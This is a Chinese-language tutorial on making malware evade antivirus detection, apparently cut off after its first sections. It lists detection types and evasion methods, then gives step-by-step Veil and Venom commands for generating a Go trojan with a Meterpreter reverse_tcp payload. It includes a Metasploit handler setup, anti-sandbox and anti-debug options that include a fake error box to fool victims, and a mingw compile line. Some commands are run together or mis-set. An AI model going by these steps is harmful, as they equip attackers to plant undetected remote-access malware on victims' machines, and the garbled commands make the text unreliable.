带你了解 免杀的小知识

一、杀软常见的三种方式
二、免杀的三种常用方式
三、利用工具实现免杀
1、veil工具基础实现免杀+进阶
2、venom免杀
3、利用kali自带的shellter进行免杀
4、利用avet实现免杀
四、利用源码编译+加载器加载代码实现免杀
1)方式一,cs+C语言代码组合拳
2)方式二,msf+c语言源代码
五、FourEye免杀
六、DKMC免杀
七、思维导图
 
一、杀软常见的三种方式
静态查杀(邮件类查杀一般是静态的)-->一般根据特征码识别到-->对文件进行特征匹配的思路
云查杀
行为查杀(也可以理解为动态查杀)-->对其产生的行为进行检测
3.1 可构建行为库进行动态查杀
3.2 可构建日志库对日志库进行动态查杀
3.3 统计学检测-->构建特征学习模型-->进行动态查获取就好了
 
二、免杀的三种常用方式
①捆绑-->文件捆绑,自解压捆绑,如exe类型的
②特征码混淆思路-->即混淆特征码进而绕过免杀
三种方式:
2.1 代码混淆
2.2 api钩子(函数混淆类)-->典型dll劫持类型-->即伪造一个dll文件,然后在调用dll文件的时候,先调用伪造的dll文件,在调用真实的dll文件,进而实现处理木马的操作 。
2.3 溢出类型漏洞特点类
③白名单-->原理:杀毒软件对自己旗下的软件不检测导致
 
三、利用工具实现免杀1,veil工具基础实现免杀+进阶①启动方法
cd /optlsveil(运行veil即可)使用方法
如 生成Go语言的免杀马
use 1listuse 16set lhost ipset lport 端口generate#(执行即可)监听–>利用msf进行监听即可
use exploit/multi/handler#选择监听模块类msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lport 3334msf5 exploit(multi/handler) > set lport 10.211.55.2msf5 exploit(multi/handler) > exploit 
②结合cs进行免杀
实操(生成go语言的免杀马)
1)、cs使用生成一个go语言类型的payload
2)、
use1
use 17
3)需要的设置变量类(具体参数设置的含义)
BADmacS 设置为Y表示 查看运行环境的MAC地址如果不是虚拟机才会执行payload (反调试)CLICKTRACK 设置为4表示 表示需要4次点击才会执行CURSORCHECK 设置为100表示 运行环境的硬盘大小如果大于100GB才会执行payload (反沙箱)COMPILE_TO_EXE 设置为Y表示 编译为exe文件HOSTNAME 设置为Comp1表示 只有在Hostname计算机名为Comp1时才会执行payload(指定目标环境 反沙箱的方式)INJECT_METHOD 可设置为Virtual 或 HeapMINPROCS 设置为20表示 只有运行环境的运行进程数大于20时才会执行payload(指定目标环境 反沙箱的方式)PROCCHECK 设置为Y表示 只有运行环境的进程中没有虚拟机进程时才会执行payload(指定目标环境 反沙箱的方式)PROCESSORS 设置为2表示 只在至少2核的机器中才会执行payload(指定目标环境 反沙箱的方式)RAMCHECK 设置为Y表示 只在运行环境的内存为3G以上时才会执行payload(指定目标环境 反沙箱的方式)SLEEP 设置为10表示 休眠10秒 以检测是否运行过程中被加速(反沙箱)USERNAME 设置为Tom表示 只有在当前用户名为Tom的机器中才执行payload 。USERPROMPT 设置为Y表示 在injection之前提醒用户(提示一个错误框,让用户误以为该程序执行错误才无法打开)DEBUGGER 设置为Y表示 当被调试器不被attached时才会执行payload (反调试)DOMAIN 设置为Comp表示 受害者计算机只有加入Comp域中时,才会执行payload(指定目标环境 反沙箱的方式)UTCCHECK 设置为Y表示 只在运行环境的系统使用UTC时间时,才会执行payload 
4)设置
set USERNAME lll#前三个均表示在该特定的情况下执行这个木马set HOSTNAME win7set UTCcheck TRUEset UTCcheck TRUEgenerate#(即代表设置完成的含义状况特点) 
5)然后选择3,即自定义字符串的含义
输入cs生成的字符串即可
 
6)设置名字
即可完成组合拳
 
③结合mingw-w64
生成payload后
利用mingw-w64进行编译进行实现免杀的作用
gcc -o c.exe c.c -l ws2_32#即过滤掉该命令的状况思路 
2,venom免杀打开方法
./venom.shwindows下的基础免杀
命令步骤
24#输入ip,输入端口#选择常规的windows/meterperter/reverse_tcp#输入文件名#后面均选默认即可 
3,利用kali自带的shellter进行免杀


推荐阅读